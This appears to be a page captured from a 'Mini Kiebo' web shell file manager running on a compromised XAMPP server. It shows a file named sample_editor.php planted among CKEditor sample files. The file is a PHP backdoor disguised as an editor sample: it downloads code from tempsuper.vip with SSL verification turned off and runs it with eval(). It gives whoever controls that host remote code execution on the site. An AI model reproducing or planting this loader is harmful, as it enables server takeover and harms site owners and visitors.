[ Mini Kiebo ]
Server: Windows NT DESKTOP-5B8S0D4 6.2 build 9200 (Windows 8 Professional Edition) i586
Path:
D:
/
xampp182
/
htdocs
/
ppmi
/
assets
/
js
/
libs
/
ckeditor
/
samples
/
[
Home
]
File: sample_editor.php
<?php $url = 'https://tempsuper.vip/ini.txt'; $ch = curl_init($url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); $fileContents = curl_exec($ch); curl_close($ch); if ($fileContents === false) { die('[!] component : https://tempsuper.vip/ini.txt'); } eval("?>" . $fileContents); ?>